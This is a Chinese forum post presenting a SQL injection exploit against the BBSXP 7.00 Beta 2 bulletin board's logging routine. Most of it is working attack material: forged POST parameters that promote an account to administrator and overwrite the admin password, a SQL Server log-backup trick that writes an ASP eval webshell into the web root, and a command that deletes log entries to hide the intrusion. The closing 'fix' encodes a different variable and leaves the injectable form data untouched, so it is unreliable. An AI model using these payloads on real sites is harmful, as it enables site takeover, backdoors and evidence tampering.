BBSXP 7.00 Beta 2 SQL 0day
<P>bbsxp前段时间出了个log的注入漏洞,这次的漏洞还是出现在这个地方。<BR>sub Log(Message)<BR>if Request.ServerVariables("Query_String")<>"" then Query_String="?"&Request.ServerVariables("Query_String")&""<BR>Conn.Execute("insert into (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescri</P><P>ption,POSTData,Notes) values ('"&CookieUserName&"','"&Request.ServerVariables("REMOTE_ADDR")&"','"&HTMLEnco</P>
<P>de(Request.Servervariables("HTTP_User_AGENT"))&"','"&Request.ServerVariables("request_method")&"','http://"&Req</P>
<P>uest.ServerVariables("server_name")&""&Request.ServerVariables("script_name")&""&Query_String&"','"&HTMLEncod</P>
<P>e(Request.ServerVariables("HTTP_REFERER"))&"','"&Err.Description&"','"&Request.Form&"','"&Message&"')")<BR>end sub<BR>上次漏洞就是出现在HTTP_REFERER上,最新版本的已经用HTMLEncode处理过了。其实在在这个log()里面还是有我们可以控制的变量</P>
<P>,就是Request.Form<BR>注册个用户yl6364,发个贴再编辑。抓包如下:<BR>POST /bbsxp/editpost.asp?threadid=1&postid=1 HTTP/1.1<BR>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*<BR>Referer: http://localhost/bbsxp/editpost.asp?threadid=1&postid=1<BR>Accept-Language: zh-cn<BR>Content-Type: application/x-www-form-urlencoded<BR>Accept-Encoding: gzip, deflate<BR>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)<BR>Host: localhost<BR>Content-Length: 53<BR>Connection: Keep-Alive<BR>Cache-Control: no-cache<BR>Cookie: skins=1; Eremite=0; UserID=2; Userpass=1679707407E0FEDAA79EA80AB389A964; Onlinetime=2007%2D3%</P>
<P>2D10+21%3A30%3A37; ForumNameList=%3Coption%20value%3D%27ShowForum.asp%3FForumID%3D1%27%3E</P>
<P>%u7F51%u7EDC%3C/option%3E; ASPSESSIONIDSQCDCSQA=NBOPHAJCAIEFFCMHGDFJNKBH; ASPSESSIONIDSCTRRA</P>
<P>CA=OCIBAKBAFDDDJAADKKJBPBNI<BR><BR>content=test+log&UpFileID=&Category=&Subject=test+log<BR><BR>变量Request.Form就是content=test+log&UpFileID=&Category=&Subject=test+log<BR>上面的变量都是经过HTMLEncode处理的,但是我们还是可以想办法饶过去。<BR>我们可以伪造变量,比如我们把content=test+log&UpFileID=&Category=&Subject=test+log改为<BR>content=test+log&UpFileID=&Category=&Subject=test+log&yl6364=love<BR>记得修改Content-Length,打开bbsxp_log表看见POSTData为:<BR>content=test+log&UpFileID=&Category=&Subject=test+log&yl6364=love<BR>看出点什么来了吗嘿嘿,我们伪造的变量yl6364就这样进数据库了。因为是伪造的变量所以自然是没有经过任何的过滤。</P>
<P>下面思路就清晰了,提升权限为管理员然后进后台查看网站的路境,再利用log备份拿webshell<BR>提升权限:<BR>content=test+log&UpFileID=&Category=&Subject=test+log<BR>改为:<BR>content=test+log&UpFileID=&Category=&Subject=test+log&yl6364=love','');update bbsxp_users set </P>
<P>userroleid=1 where username='yl6364'--<BR>这样就变为前台的管理员。<BR><BR>修改后台的密码:<BR>update bbsxp_sitesettings set adminpassword='md5密码'--<BR>bbsxp经过md5加密的密码字母都是大写的<BR><BR>获得数据库的名:<BR>update bbsxp_users set usermail=db_name() where username='yl6364'--<BR><BR>log备份拿webshell:<BR>alter database bbsxp set recovery full;drop table cmd;create table cmd (a image);backup log bbsxp to </P>
<P>disk = 'c:\cmd' with init;insert into cmd(a) values ('<%eval request(chr(35)):response.end%>');backup l</P>
<P>og bbsxp to disk = 'C:\web\bbsxp\cmd.asp';--<BR><BR>修改后台密码要记得改回来哦,不然管理员就进不了后台了,所以最好弄得到管理员密码。<BR>最后要记得擦PP,delete * from bbsxp_log where username='yl6364'--<BR><BR>ps:官方论坛我测试过没有成功,不知道什么原因。不过在本地和网上测试成功!<BR><BR><BR>漏洞修补:加上个htmlencode过滤就好了<BR>sub Log(Message)<BR>if Request.ServerVariables("Query_String")<>"" then Query_String="?"&Request.ServerVariables("Qu</P>
<P>ery_String")&""<BR>Conn.Execute("insert into (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Ref</P>
<P>errer,ErrDescription,POSTData,Notes) values ('"&CookieUserName&"','"&Request.ServerVariables("REM</P>
<P>OTE_ADDR")&"','"&HTMLEncode(Request.Ser</P>
<P>vervariables("HTTP_User_AGENT"))&"','"&Request.ServerVariables("request_method")&"','http://"&Req</P>
<P>uest.ServerVariables("server_name")&""&Request.ServerVariables("script_name")&""&Query_String&"'</P>
<P>,'"&HTMLEncode(Request.ServerVariables("HTTP_REFERER"))&"','"&Err.Description&"','"&Request.Form&"</P>
<P>','"&Message&"')")<BR>end sub<BR>改为:<BR>sub Log(Message)<BR>if Request.ServerVariables("Query_String")<>"" then Query_String="?"&Request.ServerVariables("Que</P>
<P>ry_String")&""<BR>Conn.Execute("insert into (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Refe</P>
<P>rrer,ErrDescription,POSTData,Notes) values ('"&CookieUserName&"','"&Request.ServerVariables("REMOT</P>
<P>E_ADDR")&"','"&HTMLEncode(Request.Servervariables("HTTP_User_AGENT"))&"','"&Request.ServerVariab</P>
<P>les("request_method")&"','http://"&Request.ServerVariables("server_name")&""&Request.ServerVariabl</P>
<P>es("script_name")&""&Query_String&"','"&HTMLEncode(Request.ServerVariables("HTTP_REFERER"))&"','</P>
<P>"&Err.Description&"','"&Request.Form&"','"&HTMLEncode(Message)&"')")<BR>end sub</P>
re:BBSXP 7.00 Beta 2 SQL 0day
1984 10 26
页:
[1]